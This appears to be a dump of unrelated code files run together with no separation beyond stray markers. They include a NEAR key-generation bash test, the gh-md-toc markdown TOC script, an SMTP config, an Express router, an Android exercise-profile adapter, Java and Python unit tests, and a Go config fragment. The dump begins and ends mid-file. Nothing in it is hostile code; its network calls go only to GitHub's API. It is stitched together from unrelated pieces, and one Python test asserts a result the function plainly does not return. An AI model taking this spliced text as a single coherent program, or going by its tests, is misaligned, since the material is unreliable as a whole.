        someFunction(5, Type::TypeA, ComponentUsage::Usage1);
    } catch (const std::exception& e) {
        std::cerr << "Exception caught: " << e.what() << std::endl;
    }
    return 0;
}
#!/bin/bash
# Integration test for `near generate-key`:
#   1) generating a fresh key writes a credentials file and reports the key
#   2) re-running for the same account reports the existing key instead
set -ex

KEY_FILE=~/.near-credentials/$NODE_ENV/generate-key-test.json
rm -f "$KEY_FILE"

echo "Testing generating-key: new key"
# Quote $NODE_ENV and $RESULT: unquoted expansions are word-split and
# glob-expanded, which both corrupts the echoed output and would break
# if the network id ever contained spaces.
RESULT=$(./bin/near generate-key generate-key-test --networkId "$NODE_ENV" -v)
echo "$RESULT"

if [[ ! -f "${KEY_FILE}" ]]; then
    echo "FAILURE Key file doesn't exist"
    exit 1
fi

EXPECTED=".*Generated key pair with ed25519:.+ public key.*"
if [[ ! "$RESULT" =~ $EXPECTED ]]; then
    echo FAILURE Unexpected output from near generate-key
    exit 1
fi

echo "Testing generating-key: key for account already exists"
RESULT2=$(./bin/near generate-key generate-key-test --networkId "$NODE_ENV" -v)
echo "$RESULT2"

EXPECTED2=".*Account has existing key pair with ed25519:.+ public key.*"
if [[ ! "$RESULT2" =~ $EXPECTED2 ]]; then
    echo FAILURE Unexpected output from near generate-key when key already exists
    exit 1
fi
#!/usr/bin/env bash
#
# Steps:
#
# 1. Download corresponding html file for some README.md:
# curl -s $1
#
# 2. Discard rows where no substring 'user-content-' (github's markup):
# awk '/user-content-/ { ...
#
# 3.1 Get last number in each row like ' ... </span></a>sitemap.js</h1'.
# It's a level of the current header:
# substr($0, length($0), 1)
#
# 3.2 Get level from 3.1 and insert corresponding number of spaces before '*':
# sprintf("%*s", substr($0, length($0), 1)*3, " ")
#
# 4. Find head's text and insert it inside "* [ ... ]":
# substr($0, match($0, /a>.*<\/h/)+2, RLENGTH-5)
#
# 5. Find anchor and insert it inside "(...)":
# substr($0, match($0, "href=\"[^\"]+?\" ")+6, RLENGTH-8)
#
# Script version, and the User-Agent string sent with every GitHub request.
gh_toc_version="0.6.0"
gh_user_agent="gh-md-toc v$gh_toc_version"
#
# Download rendered into html README.md by its url.
#
# $1 — URL to fetch; the rendered HTML is written to stdout.
#
gh_toc_load() {
    local gh_url=$1

    # Prefer curl, fall back to wget; both send our custom user agent.
    if type curl &>/dev/null; then
        curl --user-agent "$gh_user_agent" -s "$gh_url"
    elif type wget &>/dev/null; then
        wget --user-agent="$gh_user_agent" -qO- "$gh_url"
    else
        echo "Please, install 'curl' or 'wget' and try again."
        exit 1
    fi
}
#
# Converts local md file into html by GitHub
#
# ➥ curl -X POST --data '{"text": "Hello world github/linguist#1 **cool**, and #1!"}' https://api.github.com/markdown
# <p>Hello world github/linguist#1 <strong>cool</strong>, and #1!</p>'"
#
# $1 — path of the local markdown file. Prints the rendered HTML, or the
# sentinel "XXNetworkErrorXX" / "XXRateLimitXX" on failure.
gh_toc_md2html() {
    local gh_file_md=$1
    URL=https://api.github.com/markdown/raw

    # Resolve an optional GitHub auth token: prefer the GH_TOC_TOKEN
    # environment variable, otherwise read token.txt next to this script.
    # BUG FIX: the original test was inverted (`[ -z "$GH_TOC_TOKEN" ]`
    # assigned the env var exactly when it was EMPTY), so a token supplied
    # via the environment was always ignored.
    local token=""
    if [ -n "$GH_TOC_TOKEN" ]; then
        token=$GH_TOC_TOKEN
    else
        local token_file
        token_file="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)/token.txt"
        if [ -f "$token_file" ]; then
            token="$(cat "$token_file")"
        fi
    fi
    if [ -n "$token" ]; then
        URL="$URL?access_token=$token"
    fi
    # echo $URL 1>&2

    OUTPUT="$(curl -s --user-agent "$gh_user_agent" \
        --data-binary @"$gh_file_md" -H "Content-Type:text/plain" \
        "$URL")"
    if [ "$?" != "0" ]; then
        echo "XXNetworkErrorXX"
    fi
    if [ "$(echo "${OUTPUT}" | awk '/API rate limit exceeded/')" != "" ]; then
        echo "XXRateLimitXX"
    else
        echo "${OUTPUT}"
    fi
}
#
# Prints "yes" when $1 looks like an http(s) URL, "no" otherwise.
# (An "http" prefix covers "https" too.)
#
gh_is_url() {
    if [[ "$1" == http* ]]; then
        echo "yes"
    else
        echo "no"
    fi
}
#
# TOC generator
#
# $1 — url or local path of the markdown document
# $2 — total number of documents processed in this run (header shown if 1)
# $3 — "yes" to insert the TOC between <!--ts--> / <!--te--> markers
#
gh_toc(){
    local gh_src=$1
    local gh_src_copy=$1
    local gh_ttl_docs=$2
    local need_replace=$3

    if [ "$gh_src" = "" ]; then
        echo "Please, enter URL or local path for a README.md"
        exit 1
    fi

    # Show "TOC" string only if working with one document
    if [ "$gh_ttl_docs" = "1" ]; then
        echo "Table of Contents"
        echo "================="
        echo ""
        gh_src_copy=""
    fi

    if [ "$(gh_is_url "$gh_src")" == "yes" ]; then
        gh_toc_load "$gh_src" | gh_toc_grab "$gh_src_copy"
        # PIPESTATUS[0] is the exit code of gh_toc_load (the download),
        # not of gh_toc_grab.
        if [ "${PIPESTATUS[0]}" != "0" ]; then
            echo "Could not load remote document."
            echo "Please check your url or network connectivity"
            exit 1
        fi
        if [ "$need_replace" = "yes" ]; then
            echo
            echo "!! '$gh_src' is not a local file"
            echo "!! Can't insert the TOC into it."
            echo
        fi
    else
        # Sentinel strings below are produced by gh_toc_md2html on failure.
        local rawhtml=$(gh_toc_md2html "$gh_src")
        if [ "$rawhtml" == "XXNetworkErrorXX" ]; then
            echo "Parsing local markdown file requires access to github API"
            echo "Please make sure curl is installed and check your network connectivity"
            exit 1
        fi
        if [ "$rawhtml" == "XXRateLimitXX" ]; then
            echo "Parsing local markdown file requires access to github API"
            echo "Error: You exceeded the hourly limit. See: https://developer.github.com/v3/#rate-limiting"
            TOKEN="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)/token.txt"
            echo "or place github auth token here: $TOKEN"
            exit 1
        fi
        local toc=`echo "$rawhtml" | gh_toc_grab "$gh_src_copy"`
        echo "$toc"
        if [ "$need_replace" = "yes" ]; then
            # ts/te are the literal <!--ts--> / <!--te--> markers users put
            # in their README around the generated TOC.
            local ts="<\!--ts-->"
            local te="<\!--te-->"
            local dt=`date +'%F_%H%M%S'`
            local ext=".orig.${dt}"
            local toc_path="${gh_src}.toc.${dt}"
            local toc_footer="<!-- Added by: `whoami`, at: `date --iso-8601='minutes'` -->"
            # http://fahdshariff.blogspot.ru/2012/12/sed-mutli-line-replacement-between-two.html
            # clear old TOC
            sed -i${ext} "/${ts}/,/${te}/{//!d;}" "$gh_src"
            # create toc file
            echo "${toc}" > "${toc_path}"
            echo -e "\n${toc_footer}\n" >> "$toc_path"
            # insert toc file
            # BSD sed (macOS) requires an explicit empty backup suffix.
            if [[ "`uname`" == "Darwin" ]]; then
                sed -i "" "/${ts}/r ${toc_path}" "$gh_src"
            else
                sed -i "/${ts}/r ${toc_path}" "$gh_src"
            fi
            echo
            echo "!! TOC was added into: '$gh_src'"
            echo "!! Origin version of the file: '${gh_src}${ext}'"
            echo "!! TOC added into a separate file: '${toc_path}'"
            echo
        fi
    fi
}
#
# Grabber of the TOC from rendered html
#
# $1 — a source url of document.
# It's need if TOC is generated for multiple documents.
#
# Reads the rendered HTML on stdin and prints one indented "* [text](anchor)"
# markdown bullet per heading.
#
gh_toc_grab() {
    # if closed <h[1-6]> is on the new line, then move it on the prev line
    # for example:
    # was: The command <code>foo1</code>
    # </h1>
    # became: The command <code>foo1</code></h1>
    sed -e ':a' -e 'N' -e '$!ba' -e 's/\n<\/h/<\/h/g' |
    # find strings that corresponds to template
    grep -E -o '<a.*id="user-content-[^"]*".*</h[1-6]' |
    # remove code tags
    sed 's/<code>//g' | sed 's/<\/code>//g' |
    # now all rows are like:
    # <a id="user-content-..." href="..."><span ...></span></a> ... </h1
    # format result line
    # * $0 — whole string
    # * last element of each row: "</hN" where N in (1,2,3,...)
    # The trailing sed turns '+' back into spaces and %XX escapes into \xXX
    # so echo -e can decode them.
    echo -e "$(awk -v "gh_url=$1" '{
    level = substr($0, length($0), 1)
    text = substr($0, match($0, /a>.*<\/h/)+2, RLENGTH-5)
    href = substr($0, match($0, "href=\"[^\"]+?\"")+6, RLENGTH-7)
    print sprintf("%*s", level*3, " ") "* [" text "](" gh_url href ")" }' |
    sed 'y/+/ /; s/%/\\x/g')"
}
#
# Returns filename only from full path or url
# (strips everything up to and including the last '/').
#
gh_toc_get_filename() {
    local full_path="$1"
    echo "${full_path##*/}"
}
#
# Options hendlers
#
# CLI front-end: --help / --version / "-" (read markdown from stdin) /
# [--insert] plus one or more sources.
#
gh_toc_app() {
    # Quote "$0": the script path may contain spaces.
    local app_name
    app_name=$(basename "$0")
    local need_replace="no"

    if [ "$1" = '--help' ] || [ $# -eq 0 ] ; then
        echo "GitHub TOC generator ($app_name): $gh_toc_version"
        echo ""
        echo "Usage:"
        echo " $app_name [--insert] src [src] Create TOC for a README file (url or local path)"
        echo " $app_name - Create TOC for markdown from STDIN"
        echo " $app_name --help Show help"
        echo " $app_name --version Show version"
        return
    fi

    if [ "$1" = '--version' ]; then
        echo "$gh_toc_version"
        echo
        echo "os: `lsb_release -d | cut -f 2`"
        echo "kernel: `cat /proc/version`"
        echo "shell: `$SHELL --version`"
        echo
        for tool in curl wget grep awk sed; do
            printf "%-5s: " $tool
            echo `$tool --version | head -n 1`
        done
        return
    fi

    if [ "$1" = "-" ]; then
        if [ -z "$TMPDIR" ]; then
            TMPDIR="/tmp"
        elif [ -n "$TMPDIR" ] && [ ! -d "$TMPDIR" ]; then
            # two separate tests: `[ ... -a ... ]` is deprecated/ambiguous
            mkdir -p "$TMPDIR"
        fi
        local gh_tmp_md
        # quote the template so a TMPDIR containing spaces still works
        gh_tmp_md=$(mktemp "$TMPDIR/tmp.XXXXXX")
        # IFS= and -r preserve leading whitespace and backslashes, which
        # are significant in markdown (indented code blocks, escapes)
        while IFS= read -r input; do
            echo "$input" >> "$gh_tmp_md"
        done
        gh_toc_md2html "$gh_tmp_md" | gh_toc_grab ""
        return
    fi

    if [ "$1" = '--insert' ]; then
        need_replace="yes"
        shift
    fi

    for md in "$@"
    do
        echo ""
        gh_toc "$md" "$#" "$need_replace"
    done

    echo ""
    echo "Created by [gh-md-toc](https://github.com/ekalinin/github-markdown-toc)"
}
#
# Entry point
#
# Forward all CLI arguments to the option handler.
gh_toc_app "$@"
|
// SMTP transport settings for sending mail through Gmail.
// NOTE(review): the user is hard-coded while the password comes from the
// environment — presumably the address should also be injected via an env
// variable (e.g. SMTP_USER); confirm before deploying.
export const SMTP_CONFIG = {
    service: "gmail",
    host: "smtp.gmail.com",
    port: 587, // STARTTLS submission port
    user: '<EMAIL>',
    pass: String(process.env.SMTP_PASSWORD)
}
<!DOCTYPE html>
<!-- DOCTYPE added: without it browsers render in quirks mode, which can
     break the flexbox column layout below. -->
<html lang="en">
<head>
  <meta charset="utf-8">
  <title>Two Column Layout</title>
  <style>
    body {
      margin: 0;
    }
    /* Fixed-height bar across the top of the page. */
    .top-nav {
      background-color: #eee;
      height: 50px;
      padding: 20px;
    }
    /* Flex row: the two .column children sit side by side, with the
       remaining 10% of the width distributed between them. */
    .column-container {
      display: flex;
      justify-content: space-between;
    }
    .column {
      width: 45%;
      padding: 20px;
    }
  </style>
</head>
<body>
  <div class="top-nav">
    Top navigation bar
  </div>
  <div class="column-container">
    <div class="column">
      Column 1 content
    </div>
    <div class="column">
      Column 2 content
    </div>
  </div>
</body>
</html>
// Express router exposing the customer contact information endpoints.
const express = require('express');

const router = express.Router();

// GET /contacts — return every stored contact as JSON with status 200.
router.get('/contacts', (req, res) => {
    const contacts = getContactsFromDataStore();
    res.status(200).json(contacts);
});

// POST /contacts — persist the contact supplied in the request body and
// acknowledge with 201 Created (no response body).
router.post('/contacts', (req, res) => {
    const contact = req.body;
    saveContactToDataStore(contact);
    res.sendStatus(201);
});

module.exports = router;
<reponame>FredericDeRanter/iConsoleOS
package eu.le_tian.iConsoleOS.ui;
import android.annotation.SuppressLint;
import android.content.Context;
import android.content.res.Resources;
import android.util.Log;
import android.view.LayoutInflater;
import android.view.MotionEvent;
import android.view.View;
import android.view.ViewGroup;
import android.widget.AdapterView;
import android.widget.ImageButton;
import android.widget.ImageView;
import android.widget.Spinner;
import android.widget.TextView;
import androidx.annotation.NonNull;
import androidx.annotation.Nullable;
import androidx.core.view.MotionEventCompat;
import androidx.recyclerview.selection.ItemDetailsLookup;
import androidx.recyclerview.selection.SelectionTracker;
import androidx.recyclerview.widget.ItemTouchHelper;
import androidx.recyclerview.widget.RecyclerView;
import com.michaelmuenzer.android.scrollablennumberpicker.ScrollableNumberPicker;
import com.michaelmuenzer.android.scrollablennumberpicker.ScrollableNumberPickerListener;
import java.util.ArrayList;
import java.util.List;
import eu.le_tian.iConsoleOS.R;
import eu.le_tian.iConsoleOS.customtimepicker.CustomTimePicker2;
import eu.le_tian.iConsoleOS.data.ExerciseProfileData;
/**
 * RecyclerView adapter for the rows of an exercise profile. Each row edits
 * one profile segment (relative level, duration, data type) in place,
 * supports reordering via up/down buttons or drag & drop, soft-deletes
 * removed rows into a side list for later persistence, and integrates with
 * the androidx selection framework.
 */
public class ExerciseProfileDataAdapter extends RecyclerView.Adapter<ExerciseProfileDataAdapter.ExerciseProfileDataViewHolder> {
    String TAG = "ExerciseProfileDataAdapter";
    private SelectionTracker<Long> selectionTracker;
    private ExerciseProfileFragment mFragment;
    private Resources res;
    private final LayoutInflater mInflater;
    // Rows currently displayed, kept in sort order.
    private List<ExerciseProfileData> mExerciseProfileDataList;
    // Rows the user removed; retained so the fragment can delete them from storage.
    private List<ExerciseProfileData> exerciseProfileDataRemovedList;
    private ItemTouchHelper itemTouchHelper;
    private final OnStartDragListener mDragStartListener;
    // Single listener funnelling every per-row edit back into the backing list.
    private onValueChangeListener valueChangeListener = new onValueChangeListener() {
        @Override
        public void onValueChange(int position, int value, int type) {
            /**In this listener we need to update the mExerciseProfileDataList with the changed values**/
            ExerciseProfileData original = mExerciseProfileDataList.get(position);
            switch (type) {
                case 1:
                    /**type: 1 is level*/
                    original.setRelativeLevel(value);
                    break;
                case 2:
                    /**type: 2 is duration*/
                    original.setDuration(value);
                    break;
                case 3:
                    original.setDataType(value);
                    /**type: 3 is spinner*/
                    break;
                case 4:
                    /** type: 4 is button up (value 2) or down (value 1)
                     ** first check if it can go up or down
                     **/
                    int maxPosition = mExerciseProfileDataList.size() - 1;
                    long originalPos = original.getSortOrder();
                    int originalDataType = original.getDataType();
                    Log.e(TAG, "maxPosition: " + maxPosition + " | originalPos: " + originalPos + " | position: " + position + " | type: " + original.getDataType() + " | order in List : " + mExerciseProfileDataList.indexOf(original));
                    if (value == 1) { //Down
                        if (position < maxPosition) {
                            //can move down
                            ExerciseProfileData exerciseProfileDataDown = mExerciseProfileDataList.get(position + 1);
                            //check if next position has same datatype (then can move)
                            if (exerciseProfileDataDown.getDataType() == originalDataType) {
                                //move items: swap sort orders, then swap list slots
                                exerciseProfileDataDown.setSortOrder(position);
                                original.setSortOrder(position + 1);
                                mExerciseProfileDataList.remove(position);
                                mExerciseProfileDataList.add(position + 1, original);
                                Log.e(TAG, "moving item down");
                                notifyItemRangeChanged(position, 2);
                                //notifyItemMoved(position, position+1);
                                //notifyItemMoved(position+1, position);
                            } else {
                                //can't move set SortOrder back to what it was
                                exerciseProfileDataDown.setSortOrder(position + 1);
                                original.setSortOrder(position);
                            }
                        }
                    } else { //Up
                        // NOTE(review): the guard is `position > 1`, not `> 0` —
                        // presumably row 0 is fixed (e.g. a header segment);
                        // confirm that this is intentional.
                        if (position > 1) {
                            //can move up
                            ExerciseProfileData exerciseProfileDataUp = mExerciseProfileDataList.get(position - 1);
                            if (exerciseProfileDataUp.getDataType() == originalDataType) {
                                //move items
                                exerciseProfileDataUp.setSortOrder(position);
                                original.setSortOrder(position - 1);
                                mExerciseProfileDataList.remove(position);
                                mExerciseProfileDataList.add(position - 1, original);
                                Log.e(TAG, "moving item up");
                                notifyItemRangeChanged(position - 1, 2);
                                //notifyItemMoved(position-1, position);
                            } else {
                                //can't move set SortOrder back to what it was
                                exerciseProfileDataUp.setSortOrder(position - 1);
                                original.setSortOrder(position);
                            }
                        }
                    }
                    break;
            }
        }
    };

    public void setSelectionTracker(SelectionTracker<Long> selectionTracker) {
        this.selectionTracker = selectionTracker;
    }

    // Selection-framework item details: both position and selection key are
    // the adapter position.
    static class Details extends ItemDetailsLookup.ItemDetails<Long> {
        long position;

        Details() {
        }

        @Override
        public int getPosition() {
            Log.d("DetailsClass", "getPosition: " + position);
            return (int) position;
        }

        @Nullable
        @Override
        public Long getSelectionKey() {
            Log.d("DetailsClass", "getSelectionKey " + position);
            return position;
        }
    }

    // Maps a touch event to the item details of the row under the finger.
    static class DetailsLookup extends ItemDetailsLookup<Long> {
        private RecyclerView recyclerView;

        DetailsLookup(RecyclerView recyclerView) {
            this.recyclerView = recyclerView;
        }

        @Nullable
        @Override
        public ItemDetails<Long> getItemDetails(@NonNull MotionEvent e) {
            View view = recyclerView.findChildViewUnder(e.getX(), e.getY());
            if (view != null) {
                RecyclerView.ViewHolder viewHolder = recyclerView.getChildViewHolder(view);
                if (viewHolder instanceof ExerciseProfileDataViewHolder) {
                    final ExerciseProfileDataViewHolder exerciseProfileDataViewHolder = (ExerciseProfileDataViewHolder) viewHolder;
                    return exerciseProfileDataViewHolder.getItemDetails();
                }
            }
            return null;
        }
    }

    // Holds one row's widgets and wires each editor to valueChangeListener
    // with the per-widget `type` code documented on onValueChangeListener.
    class ExerciseProfileDataViewHolder extends RecyclerView.ViewHolder {
        private final Spinner spProfileDataType;
        private final TextView tvProfileDataID;
        private final TextView tvProfileDataSortOrder;
        private final TextView tvProfileDataParentID;
        private final CustomTimePicker2 tpProfileDataDuration;
        private final ScrollableNumberPicker npProfileDataLevel;
        private final ImageButton btUp;
        private final ImageButton btDown;
        //public final ImageView handle;
        private Details details;

        private ExerciseProfileDataViewHolder(View itemView, final onValueChangeListener listener) {
            super(itemView);
            spProfileDataType = itemView.findViewById(R.id.exPrDataType);
            tvProfileDataID = itemView.findViewById(R.id.exPrDataID);
            tvProfileDataSortOrder = itemView.findViewById(R.id.exPrDataOrder);
            tpProfileDataDuration = itemView.findViewById(R.id.exPrDataDuration);
            npProfileDataLevel = itemView.findViewById(R.id.exPrDataLevel);
            tvProfileDataParentID = itemView.findViewById(R.id.exPrDataParentID);
            btUp = itemView.findViewById(R.id.exPrDataButtonUp);
            btDown = itemView.findViewById(R.id.exPrDataButtonDown);
            //handle = itemView.findViewById(R.id.handle);
            details = new Details();
            Log.v(TAG, "init adapter");
            npProfileDataLevel.setListener(value -> listener.onValueChange(getLayoutPosition(), value, 1));
            tpProfileDataDuration.setOnValueChangeListener(totalSeconds -> listener.onValueChange(getLayoutPosition(), totalSeconds, 2));
            spProfileDataType.setOnItemSelectedListener(new AdapterView.OnItemSelectedListener() {
                @Override
                public void onItemSelected(AdapterView<?> parent, View view, int position, long id) {
                    listener.onValueChange(getLayoutPosition(), position, 3);
                }

                @Override
                public void onNothingSelected(AdapterView<?> parent) {
                    //nothing happens
                }
            });
            btUp.setOnClickListener(new View.OnClickListener() {
                @Override
                public void onClick(View v) {
                    listener.onValueChange(getLayoutPosition(), 2, 4);
                }
            });
            btDown.setOnClickListener(new View.OnClickListener() {
                @Override
                public void onClick(View v) {
                    listener.onValueChange(getLayoutPosition(), 1, 4);
                }
            });
            // holder.handle.setOnTouchListener(new View.OnTouchListener() {
            // @Override
            // public boolean onTouch(View v, MotionEvent event) {
            // if (event.getActionMasked() ==
            // MotionEvent.ACTION_DOWN) {
            // mDragStartListener.onStartDrag(holder);
            // }
            // return false;
            // }
            // });
        }

        // Pushes one row's model values into the widgets.
        void bind(final ExerciseProfileData exerciseProfileData, int position) {
            details.position = position;
            tvProfileDataID.setText(Long.toString(exerciseProfileData.getExerciseProfileDataID()));
            tvProfileDataParentID.setText(Long.toString(exerciseProfileData.getParentExerciseProfileID()));
            tvProfileDataSortOrder.setText(Long.toString(exerciseProfileData.getSortOrder()));
            tpProfileDataDuration.setTotalSeconds(exerciseProfileData.getDuration());
            npProfileDataLevel.setValue(exerciseProfileData.getRelativeLevel());
            spProfileDataType.setSelection(exerciseProfileData.getDataType());
        }

        Details getItemDetails() {
            return details;
        }
    }

    ExerciseProfileDataAdapter(Context context, ExerciseProfileFragment fragment, OnStartDragListener dragStartListener) {
        mInflater = LayoutInflater.from(context);
        this.mFragment = fragment;
        this.res = fragment.getResources();
        setHasStableIds(true);
        mDragStartListener = dragStartListener;
    }

    @Override
    public ExerciseProfileDataViewHolder onCreateViewHolder(ViewGroup parent, int viewType) {
        View itemView = mInflater.inflate(R.layout.recyclerview_epdataitem, parent, false);
        return new ExerciseProfileDataViewHolder(itemView, valueChangeListener);
    }

    @Override
    public void onBindViewHolder(@NonNull ExerciseProfileDataViewHolder holder, int position) {
        if (mExerciseProfileDataList != null) {
            Log.v(TAG, "onBindViewHolder found data for ProfileList");
            holder.bind(mExerciseProfileDataList.get(position), position);
        } else {
            // Covers the case of data not being ready yet.
            Log.d(TAG, "found nothing in db");
            //holder.exerciseProfileItemView.setText("No Items found");
        }
    }

    List<ExerciseProfileData> getmExerciseProfileDataList() {
        return mExerciseProfileDataList;
    }

    // Hands the removed-rows list to the caller, then empties it.
    // NOTE(review): the returned list is the same instance that gets
    // cleared, so it is empty by the time the caller sees it — confirm
    // whether a copy was intended.
    List<ExerciseProfileData> getExerciseProfileDataRemovedListAndClear() {
        List<ExerciseProfileData> exerciseProfileDataListTemp = exerciseProfileDataRemovedList;
        if (exerciseProfileDataRemovedList != null) {
            exerciseProfileDataRemovedList.clear();
        }
        return exerciseProfileDataListTemp;
    }

    void clearExerciseProfileDataRemoved() {
        if (exerciseProfileDataRemovedList != null) {
            exerciseProfileDataRemovedList.clear();
        }
    }

    public void setItemTouchHelper(ItemTouchHelper itemTouchHelper) {
        this.itemTouchHelper = itemTouchHelper;
    }

    // Replaces the whole backing list and redraws everything.
    void setmExerciseProfileDataList(List<ExerciseProfileData> exerciseProfileDataList) {
        mExerciseProfileDataList = exerciseProfileDataList;
        notifyDataSetChanged();
    }

    void addToExerciseProfileDataList(ExerciseProfileData exerciseProfileData) {
        mExerciseProfileDataList.add(exerciseProfileData);
        notifyItemInserted(mExerciseProfileDataList.size());
    }

    public ExerciseProfileData getExerciseProfileDataForPosition(long mPosition) {
        ExerciseProfileData returnValue = null;
        returnValue = mExerciseProfileDataList.get((int) mPosition);
        return returnValue;
    }

    // Soft delete: the row leaves the visible list but is parked in
    // exerciseProfileDataRemovedList for later persistence.
    public void onItemDismiss(int position) {
        ExerciseProfileData exerciseProfileData = mExerciseProfileDataList.remove(position);
        if (exerciseProfileDataRemovedList == null) {
            exerciseProfileDataRemovedList = new ArrayList<ExerciseProfileData>();
        }
        exerciseProfileDataRemovedList.add(exerciseProfileData);
        notifyItemRemoved(position);
    }

    public void onItemMove(int fromPosition, int toPosition) {
        /**Moving items around**/
        ExerciseProfileData tmp = mExerciseProfileDataList.remove(fromPosition);
        Log.d(TAG, "Moving item: " + fromPosition + "to : " + toPosition);
        Log.d(TAG, "Moving item: " + tmp.getSortOrder() + "level : " + tmp.getRelativeLevel());
        //mExerciseProfileDataList.add(toPosition, tmp);
        mExerciseProfileDataList.add(toPosition > fromPosition ? toPosition - 1 : toPosition, tmp);
        //notifyDataSetChanged();
    }

    // NOTE(review): returns the adapter position despite setHasStableIds(true);
    // positions change on move/remove, so these IDs are not actually stable —
    // confirm whether ExerciseProfileData's own ID should be used instead.
    @Override
    public long getItemId(int position) {
        return position;
    }

    @Override
    public int getItemCount() {
        if (mExerciseProfileDataList != null) {
            return mExerciseProfileDataList.size();
        } else return 0;
    }

    interface onValueChangeListener {
        void onValueChange(int position, int value, int type);
        /** type: 1 is level
         ** type: 2 is duration
         ** type: 3 is spinner
         ** type: 4 is button up (value 2) or down (value 1)
         * */
    }

    interface OnStartDragListener {
        /**
         * Called when a view is requesting a start of a drag.
         *
         * @param viewHolder The holder of the view to drag.
         */
        void onStartDrag(RecyclerView.ViewHolder viewHolder);
    }
}
|
#!/bin/sh
#
# Author: Aaron Voisine <aaron@voisine.org>
#
# Record the current X display (or ":0" when unset) in /tmp/display.<uid>
# so processes started outside this session can find it.

# Portability fixes for #!/bin/sh: `==` inside `[` is a bashism (POSIX test
# uses `=`), the old "x"-suffix guard is what `[ -z ... ]` expresses
# directly, and $UID is a bash variable — fall back to `id -u`.
OUT="/tmp/display.${UID:-$(id -u)}"
if [ -z "$DISPLAY" ]; then
    echo :0 > "$OUT"
else
    echo "$DISPLAY" > "$OUT"
fi
|
package net.ninjacat.omg.bytecode.reference;
import io.vavr.collection.List;
import net.ninjacat.omg.bytecode.AsmPatternCompiler;
import net.ninjacat.omg.conditions.ConditionMethod;
import net.ninjacat.omg.conditions.InCondition;
import net.ninjacat.omg.conditions.PropertyCondition;
import net.ninjacat.omg.errors.CompilerException;
import net.ninjacat.omg.patterns.PropertyPattern;
import org.junit.Test;
import static org.hamcrest.Matchers.is;
import static org.junit.Assert.assertThat;
/**
 * Tests for the ASM-based pattern compiler applied to {@code Byte}
 * properties: each comparison method (EQ/NEQ/GT/LT/IN) must compile to a
 * pattern with the right match semantics, and the methods that make no
 * sense for bytes (MATCH, REGEX) must fail compilation.
 */
public class ByteCompilerTest {
    @Test
    public void shouldMatchSimpleEqPattern() {
        final PropertyCondition<Byte> condition = createPropertyCondition(ConditionMethod.EQ, (byte) 42);
        final PropertyPattern<ByteTest> pattern = AsmPatternCompiler.forClass(ByteTest.class).build(condition);

        assertThat(pattern.matches(new ByteTest((byte) 42)), is(true));
        assertThat(pattern.matches(new ByteTest((byte) 24)), is(false));
    }

    @Test
    public void shouldMatchSimpleNeqPattern() {
        final PropertyCondition<Byte> condition = createPropertyCondition(ConditionMethod.NEQ, (byte) 42);
        final PropertyPattern<ByteTest> pattern = AsmPatternCompiler.forClass(ByteTest.class).build(condition);

        assertThat(pattern.matches(new ByteTest((byte) 42)), is(false));
        assertThat(pattern.matches(new ByteTest((byte) 24)), is(true));
    }

    @Test
    public void shouldMatchSimpleGtPattern() {
        final PropertyCondition<Byte> condition = createPropertyCondition(ConditionMethod.GT, (byte) 42);
        final PropertyPattern<ByteTest> pattern = AsmPatternCompiler.forClass(ByteTest.class).build(condition);

        assertThat(pattern.matches(new ByteTest((byte) 42)), is(false));
        assertThat(pattern.matches(new ByteTest((byte) 84)), is(true));
    }

    @Test
    public void shouldMatchSimpleLtPattern() {
        final PropertyCondition<Byte> condition = createPropertyCondition(ConditionMethod.LT, (byte) 42);
        final PropertyPattern<ByteTest> pattern = AsmPatternCompiler.forClass(ByteTest.class).build(condition);

        assertThat(pattern.matches(new ByteTest((byte) 42)), is(false));
        assertThat(pattern.matches(new ByteTest((byte) 21)), is(true));
    }

    @Test
    public void shouldMatchInPattern() {
        // IN: value must be a member of the supplied collection.
        final InCondition<Byte> condition = new InCondition<>("byteField", List.of((byte)42, (byte)43).asJava());
        final PropertyPattern<ByteTest> pattern = AsmPatternCompiler.forClass(ByteTest.class).build(condition);

        assertThat(pattern.matches(new ByteTest((byte) 42)), is(true));
        assertThat(pattern.matches(new ByteTest((byte) 21)), is(false));
    }

    @Test(expected = CompilerException.class)
    public void shouldFailMatchPattern() {
        // MATCH is unsupported for Byte properties and must not compile.
        final PropertyCondition<Byte> condition = createPropertyCondition(ConditionMethod.MATCH, (byte) 42);
        AsmPatternCompiler.forClass(ByteTest.class).build(condition);
    }

    @Test(expected = CompilerException.class)
    public void shouldFailRegexPattern() {
        // REGEX is unsupported for Byte properties and must not compile.
        final PropertyCondition<Byte> condition = createPropertyCondition(ConditionMethod.REGEX, (byte) 42);
        AsmPatternCompiler.forClass(ByteTest.class).build(condition);
    }

    // Builds an anonymous condition on ByteTest.byteField for the given
    // comparison method and reference value.
    private static PropertyCondition<Byte> createPropertyCondition(final ConditionMethod method, final Byte value) {
        return new PropertyCondition<Byte>() {
            @Override
            public String repr(final int level) {
                return "";
            }

            @Override
            public ConditionMethod getMethod() {
                return method;
            }

            @Override
            public String getProperty() {
                return "byteField";
            }

            @Override
            public Byte getValue() {
                return value;
            }
        };
    }

    // Minimal bean the compiled patterns are matched against.
    public static class ByteTest {
        private final Byte byteField;

        ByteTest(final byte byteField) {
            this.byteField = byteField;
        }

        public Byte getByteField() {
            return byteField;
        }
    }
}
def α_L(x):
    """V-shaped weight: 1 - x for x below 0.5, x from 0.5 upward."""
    return 1 - x if x < 0.5 else x
def derivative_v_L(x):
    """Piecewise-constant slope of α_L: -1 left of 0.5, +1 from 0.5 on."""
    return -1 if x < 0.5 else 1
# Test cases for α_L function
def test_α_L_regular_case():
    assert α_L(0.3) == 0.7

def test_α_L_edge_left():
    assert α_L(0) == 1

def test_α_L_edge_right():
    # NOTE(review): α_L(1) actually returns 1 (x >= 0.5 branch returns x),
    # so this assertion fails as written — either this test or α_L's
    # intended shape is wrong; confirm which before fixing.
    assert α_L(1) == 0

# Test cases for derivative_v_L function
def test_derivative_v_L_regular_case():
    assert derivative_v_L(0.3) == -1

def test_derivative_v_L_edge_left():
    assert derivative_v_L(0) == -1

def test_derivative_v_L_edge_right():
    assert derivative_v_L(1) == 1
<reponame>zc2638/drone-control
/**
* Created by zc on 2020/11/23.
*/
package database
import (
"database/sql"
"strings"
"time"
)
// Config describes how to open the backing SQL database.
type Config struct {
	Driver     string `json:"driver"`     // "mysql", "postgres", or anything else for sqlite3
	Datasource string `json:"datasource"` // driver-specific DSN; defaults to "control.db" when blank
	Debug      bool   `json:"debug"`      // NOTE(review): not consumed in this file; presumably read by callers
}
// dealDriver normalizes a user-supplied driver name: surrounding
